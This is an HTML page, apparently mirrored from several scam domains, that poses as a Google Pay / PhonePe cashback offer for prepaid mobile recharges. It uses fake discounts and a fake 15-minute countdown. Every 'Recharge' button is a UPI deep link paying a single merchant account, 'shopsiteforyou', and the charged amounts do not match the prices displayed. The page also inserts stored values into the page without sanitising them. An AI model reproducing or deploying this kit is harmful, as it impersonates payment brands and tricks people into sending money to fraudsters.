
<!doctype html>
<html lang="en">


<!-- Mirrored from vi.zondy.shop/recharge.php by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 11 Aug 2024 05:06:17 GMT -->
<!-- Added by HTTrack -->
<!-- Mirrored from ji.gazeettee.com/recharge.html by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 13 Aug 2024 04:56:37 GMT -->

<!-- Mirrored from independence-offers.shop/recharge.html by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 13 Aug 2024 06:33:16 GMT -->
<meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
    <meta charset="utf-8">
    <link rel="icon" href="favicon.png">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <meta name="theme-color" content="#000000">
    <meta name="description" content="Web site created using create-react-app">
    <link rel="apple-touch-icon" href="favicon.png">
    <title>Phonepe Cashbacks & Offers</title>
    <script defer="defer" src="js/custom.js"></script>
    <link href="css/main.css" rel="stylesheet">

</head>
<body>

    <div id="mainContent" >
        <div class="py-4 px-6 bg-white flex items-center justify-between border-b border-slate-100 mb-0">
            <div class="nav-main" style="display: flex; gap: 20px;">
                <img style="width: 25px; height: 25px; margin-top: 35px;" src="media/download.svg" alt="">
                <img class="goog" style="width: 150px; height: 100px; " src="media/Google-Pay-logo.png" alt="" class="h-8">
            </div>
        <div><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 512 512"
            style="color: #0000FF;" height="30" width="30" xmlns="http://www.w3.org/2000/svg">
            <path
                d="M399 384.2C376.9 345.8 335.4 320 288 320H224c-47.4 0-88.9 25.8-111 64.2c35.2 39.2 86.2 63.8 143 63.8s107.8-24.7 143-63.8zM0 256a256 256 0 1 1 512 0A256 256 0 1 1 0 256zm256 16a72 72 0 1 0 0-144 72 72 0 1 0 0 144z">
            </path>
        </svg>
        </div>
    </div>

    <div>
    <div class="pad bg-slate-100 py-4 px-4 text-[13.4px] flex items-center justify-between">
        <div class="flex items-center">
            <div class="rech font-bold text-[14px] text-purple-900 ml-2" id="displayNumber">
                <div>Recharge for: <span id="numbSpan">Unknown Number</span></div>
                <div class="text-slate-500 font-normal text-[12px] mt-[-2px]" id="provSpan">Unknown Provider <div>Prepaid</div></div>
            </div>
        </div>
        <a class="text-purple-600" href="index-2.html">Change</a>
    </div>
    </div>        
    <div class=" px-2 my-0 bg-purple-200 py-5">
        <h1 class="text-[20px] font-bold text-center text-purple-900 mt-[-2px]">Google Pay Exclusive!</h1>
    </div>
    <div class="exclu">
        <p>Special offer Ends In: <span id="countdown"></span></p>
    </div>
        <div class="tom">
            <div class="gar bg-white rounded-xl p-4 my-4">
                <a href="phonepe://pay?pa=sbipmopad.02sob0000004511-yc016161@sbipay&am=99&pn=shopsiteforyou&tr=cWlb5sIV0YVgY&mc=8931&orgid=000000&mode=01&cu=INR&tn=shopsiteforyou+OrderId:1133">
                <div class="bg-rose-600 py-1 px-3 rounded text-white text-[10px] font-bold w-fit">New</div>
                <div class="flex items-center justify-between my-2">
                    <div class="flex items-center text-[20px] font-bold text-slate-800">
                        <div>₹149.26</div>
                        <div class="ml-4 line-through text-slate-600">₹749</div>
                    </div>
                    <div><img src="media/5g.eec5aabd88995f7798a04639984c429a.svg" alt=""></div>
                </div>
                <div class="flex items-center justify-between mt-3">
                    <div class="">
                        <div class="text-slate-600 text-[13px]">VALIDITY</div>
                        <div class="text-slate-800 text-[13px] font-bold">84 days</div>
                    </div>
                    <div class="">
                        <div class="text-slate-600 text-[13px]">DATA</div>
                        <div class="text-slate-800 text-[13px] font-bold">1.5 GB/day</div>
                    </div>
                    <div class="">
                        <div class="text-slate-600 text-[13px]">Voice</div>
                        <div class="text-slate-800 text-[13px] font-bold">Unlimited</div>
                    </div>
                    <div class="">
                        <div class="text-slate-600 text-[13px]">SMS</div>
                        <div class="text-slate-800 text-[13px] font-bold">100/day</div>
                    </div>
                </div>
                <div class="mt-5"><button
                        class="big bg-[#5F259F] py-2 w-full text-[13px] rounded-xl font-bold text-white">Recharge</button></div>
            </a>
            </div>
            <div class="gar bg-white rounded-xl p-4 my-4">
                <a href="phonepe://pay?pa=sbipmopad.02sob0000004511-yc016161@sbipay&am=129&pn=shopsiteforyou&tr=cWlb5sIV0YVgY&mc=8931&orgid=000000&mode=01&cu=INR&tn=shopsiteforyou+OrderId:1133">
                <div class="bg-rose-600 py-1 px-3 rounded text-white text-[10px] font-bold w-fit">New</div>
                <div class="flex items-center justify-between my-2">
                    <div class="flex items-center text-[20px] font-bold text-slate-800">
                        <div>₹379.20</div>
                        <div class="ml-4 line-through text-slate-600">₹2499</div>
                    </div>
                    <div><img src="media/5g.eec5aabd88995f7798a04639984c429a.svg" alt=""></div>
                </div>
                <div class="flex items-center justify-between mt-3">
                    <div class="">
                        <div class="text-slate-600 text-[13px]">VALIDITY</div>
                        <div class="text-slate-800 text-[13px] font-bold">12 month</div>
                    </div>
                    <div class="">
                        <div class="text-slate-600 text-[13px]">DATA</div>
                        <div class="text-slate-800 text-[13px] font-bold">2.0 GB/day</div>
                    </div>
                    <div class="">
                        <div class="text-slate-600 text-[13px]">Voice</div>
                        <div class="text-slate-800 text-[13px] font-bold">Unlimited</div>
                    </div>
                    <div class="">
                        <div class="text-slate-600 text-[13px]">SMS</div>
                        <div class="text-slate-800 text-[13px] font-bold">100/day</div>
                    </div>
                </div>
                <div class="mt-5"><button
                        class="big bg-[#5F259F] py-2 w-full text-[13px] rounded-xl font-bold text-white">Recharge</button></div>
            </a>
            </div>
            <div class="gar bg-white rounded-xl p-4 my-4">
                <a href="phonepe://pay?pa=sbipmopad.02sob0000004511-yc016161@sbipay&am=149&pn=shopsiteforyou&tr=cWlb5sIV0YVgY&mc=8931&orgid=000000&mode=01&cu=INR&tn=shopsiteforyou+OrderId:1133">
                <div class="bg-rose-600 py-1 px-3 rounded text-white text-[10px] font-bold w-fit">New</div>
                <div class="flex items-center justify-between my-2">
                    <div class="flex items-center text-[20px] font-bold text-slate-800">
                        <div>₹279</div>
                        <div class="ml-4 line-through text-slate-600">₹1999</div>
                    </div>
                    <div><img src="media/5g.eec5aabd88995f7798a04639984c429a.svg" alt=""></div>
                </div>
                <div class="flex items-center justify-between mt-3">
                    <div class="">
                        <div class="text-slate-600 text-[13px]">VALIDITY</div>
                        <div class="text-slate-800 text-[13px] font-bold">6 month</div>
                    </div>
                    <div class="">
                        <div class="text-slate-600 text-[13px]">DATA</div>
                        <div class="text-slate-800 text-[13px] font-bold">3.0 GB/day</div>
                    </div>
                    <div class="">
                        <div class="text-slate-600 text-[13px]">Voice</div>
                        <div class="text-slate-800 text-[13px] font-bold">Unlimited</div>
                    </div>
                    <div class="">
                        <div class="text-slate-600 text-[13px]">SMS</div>
                        <div class="text-slate-800 text-[13px] font-bold">100/day</div>
                    </div>
                </div>
                <div class="mt-5"><button
                        class="big bg-[#5F259F] py-2 w-full text-[13px] rounded-xl font-bold text-white">Recharge</button></div>
            </a>
            </div>
            <div class="gar bg-white rounded-xl p-4 my-4">
                <a href="phonepe://pay?pa=sbipmopad.02sob0000004511-yc016161@sbipay&am=199&pn=shopsiteforyou&tr=cWlb5sIV0YVgY&mc=8931&orgid=000000&mode=01&cu=INR&tn=shopsiteforyou+OrderId:1133">
                <div class="bg-rose-600 py-1 px-3 rounded text-white text-[10px] font-bold w-fit">New</div>
                <div class="flex items-center justify-between my-2">
                    <div class="flex items-center text-[20px] font-bold text-slate-800">
                        <div>₹249.64</div>
                        <div class="ml-4 line-through text-slate-600">₹1299</div>
                    </div>
                    <div><img src="media/5g.eec5aabd88995f7798a04639984c429a.svg" alt=""></div>
                </div>
                <div class="flex items-center justify-between mt-3">
                    <div class="">
                        <div class="text-slate-600 text-[13px]">VALIDITY</div>
                        <div class="text-slate-800 text-[13px] font-bold">6 month</div>
                    </div>
                    <div class="">
                        <div class="text-slate-600 text-[13px]">DATA</div>
                        <div class="text-slate-800 text-[13px] font-bold">2.0 GB/day</div>
                    </div>
                    <div class="">
                        <div class="text-slate-600 text-[13px]">Voice</div>
                        <div class="text-slate-800 text-[13px] font-bold">Unlimited</div>
                    </div>
                    <div class="">
                        <div class="text-slate-600 text-[13px]">SMS</div>
                        <div class="text-slate-800 text-[13px] font-bold">100/day</div>
                    </div>
                </div>
                <div class="mt-5"><button
                        class="big bg-[#5F259F] py-2 w-full text-[13px] rounded-xl font-bold text-white">Recharge</button></div>
                </a>
            </div>
            <div class="gar bg-white rounded-xl p-4 my-4">
                <a href="phonepe://pay?pa=sbipmopad.02sob0000004511-yc016161@sbipay&am=229&pn=shopsiteforyou&tr=cWlb5sIV0YVgY&mc=8931&orgid=000000&mode=01&cu=INR&tn=shopsiteforyou+OrderId:1133">
                <div class="bg-rose-600 py-1 px-3 rounded text-white text-[10px] font-bold w-fit">New</div>
                <div class="flex items-center justify-between my-2">
                    <div class="flex items-center text-[20px] font-bold text-slate-800">
                        <div>₹199</div>
                        <div class="ml-4 line-through text-slate-600">₹999</div>
                    </div>
                    <div><img src="media/5g.eec5aabd88995f7798a04639984c429a.svg" alt=""></div>
                </div>
                <div class="flex items-center justify-between mt-3">
                    <div class="">
                        <div class="text-slate-600 text-[13px]">VALIDITY</div>
                        <div class="text-slate-800 text-[13px] font-bold">84 days</div>
                    </div>
                    <div class="">
                        <div class="text-slate-600 text-[13px]">DATA</div>
                        <div class="text-slate-800 text-[13px] font-bold">3.0 GB/day</div>
                    </div>
                    <div class="">
                        <div class="text-slate-600 text-[13px]">Voice</div>
                        <div class="text-slate-800 text-[13px] font-bold">Unlimited</div>
                    </div>
                    <div class="">
                        <div class="text-slate-600 text-[13px]">SMS</div>
                        <div class="text-slate-800 text-[13px] font-bold">100/day</div>
                    </div>
                </div>
                <div class="mt-5"><button
                        class="big bg-[#5F259F] py-2 w-full text-[13px] rounded-xl font-bold text-white">Recharge</button></div>
            </a>
            </div>
            <div class="gar bg-white rounded-xl p-4 my-4">
                <a href="phonepe://pay?pa=sbipmopad.02sob0000004511-yc016161@sbipay&am=249&pn=shopsiteforyou&tr=cWlb5sIV0YVgY&mc=8931&orgid=000000&mode=01&cu=INR&tn=shopsiteforyou+OrderId:1133">
                <div class="bg-rose-600 py-1 px-3 rounded text-white text-[10px] font-bold w-fit">New</div>
                <div class="flex items-center justify-between my-2">
                    <div class="flex items-center text-[20px] font-bold text-slate-800">
                        <div>₹249</div>
                        <div class="ml-4 line-through text-slate-600">₹2999</div>
                    </div>
                    <div><img src="media/5g.eec5aabd88995f7798a04639984c429a.svg" alt=""></div>
                </div>
                <div class="flex items-center justify-between mt-3">
                    <div class="">
                        <div class="text-slate-600 text-[13px]">VALIDITY</div>
                        <div class="text-slate-800 text-[13px] font-bold">12 month</div>
                    </div>
                    <div class="">
                        <div class="text-slate-600 text-[13px]">DATA</div>
                        <div class="text-slate-800 text-[13px] font-bold">2.0 GB/day</div>
                    </div>
                    <div class="">
                        <div class="text-slate-600 text-[13px]">Voice</div>
                        <div class="text-slate-800 text-[13px] font-bold">Unlimited</div>
                    </div>
                    <div class="">
                        <div class="text-slate-600 text-[13px]">SMS</div>
                        <div class="text-slate-800 text-[13px] font-bold">100/day</div>
                    </div>
                </div>
                <div class="mt-5"><button
                        class="big bg-[#5F259F] py-2 w-full text-[13px] rounded-xl font-bold text-white">Recharge</button></div>
            </a>
            </div>
            <div class="gar bg-white rounded-xl p-4 my-4">
                <a href="phonepe://pay?pa=sbipmopad.02sob0000004511-yc016161@sbipay&am=299&pn=shopsiteforyou&tr=cWlb5sIV0YVgY&mc=8931&orgid=000000&mode=01&cu=INR&tn=shopsiteforyou+OrderId:1133">
                <div class="bg-rose-600 py-1 px-3 rounded text-white text-[10px] font-bold w-fit">New</div>
                <div class="flex items-center justify-between my-2">
                    <div class="flex items-center text-[20px] font-bold text-slate-800">
                        <div>₹299</div>
                        <div class="ml-4 line-through text-slate-600">₹3499</div>
                    </div>
                    <div><img src="media/5g.eec5aabd88995f7798a04639984c429a.svg" alt=""></div>
                </div>
                <div class="flex items-center justify-between mt-3">
                    <div class="">
                        <div class="text-slate-600 text-[13px]">VALIDITY</div>
                        <div class="text-slate-800 text-[13px] font-bold">12 month</div>
                    </div>
                    <div class="">
                        <div class="text-slate-600 text-[13px]">DATA</div>
                        <div class="text-slate-800 text-[13px] font-bold">3.0 GB/day</div>
                    </div>
                    <div class="">
                        <div class="text-slate-600 text-[13px]">Voice</div>
                        <div class="text-slate-800 text-[13px] font-bold">Unlimited</div>
                    </div>
                    <div class="">
                        <div class="text-slate-600 text-[13px]">SMS</div>
                        <div class="text-slate-800 text-[13px] font-bold">100/day</div>
                    </div>
                </div>
                <div class="mt-5"><button
                        class="big bg-[#5F259F] py-2 w-full text-[13px] rounded-xl font-bold text-white">Recharge</button></div>
            </a>
            </div>
        </div>
    <div></div><img src="media/Google-Pay-Recharge-O    ffer.png.webp" style="width: 100%;" alt="" class="mt-3">
</div>
    </div>

<script>
    let numbSpan = document.getElementById('numbSpan');
    let provSpan = document.getElementById('provSpan');
    let headLogo = document.getElementById('headLogo');
    let numberr = localStorage.getItem('numberr');
    let providerr = localStorage.getItem('providerr');
    numbSpan.innerHTML = numberr;
    provSpan.innerHTML = providerr;
    if(providerr == 'Airtel Prepaid'){
        headLogo.innerHTML = `<img src="media/airtel-logo.png" alt="Unknown Provider" class="h-12 rounded-full">`;
    }else if(providerr == 'jio Prepaid'){
        headLogo.innerHTML = `<img src="media/jio-logo.png" alt="Unknown Provider" class="h-12 rounded-full">`;
    }else if(providerr == 'vi Prepaid'){
        headLogo.innerHTML = `<img src="media/vi-logo.png" alt="Unknown Provider" class="h-12 rounded-full">`;
    }else if(providerr == 'bsnl Prepaid'){
        headLogo.innerHTML = `<img src="media/bsnl-logo.png" alt="Unknown Provider" class="h-12 rounded-full">`;
    }

    let countdownTime = 15 * 60;

function updateCountdown() {
    let minutes = Math.floor(countdownTime / 60);
    let seconds = countdownTime % 60;

    minutes = minutes < 10 ? '0' + minutes : minutes;
    seconds = seconds < 10 ? '0' + seconds : seconds;

    document.getElementById('countdown').innerText = `${minutes}:${seconds}`;

    if (countdownTime <= 0) {
        clearInterval(timer);
        document.getElementById('countdown').innerText = "Offer has ended!";
    } else {
        countdownTime--;
    }
}

let timer = setInterval(updateCountdown, 1000);
updateCountdown();
</script>
</body>

<!-- Mirrored from vi.zondy.shop/recharge.php by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 11 Aug 2024 05:06:18 GMT -->

<!-- Mirrored from ji.gazeettee.com/recharge.html by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 13 Aug 2024 04:56:37 GMT -->

<!-- Mirrored from independence-offers.shop/recharge.html by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 13 Aug 2024 06:33:17 GMT -->
</html>
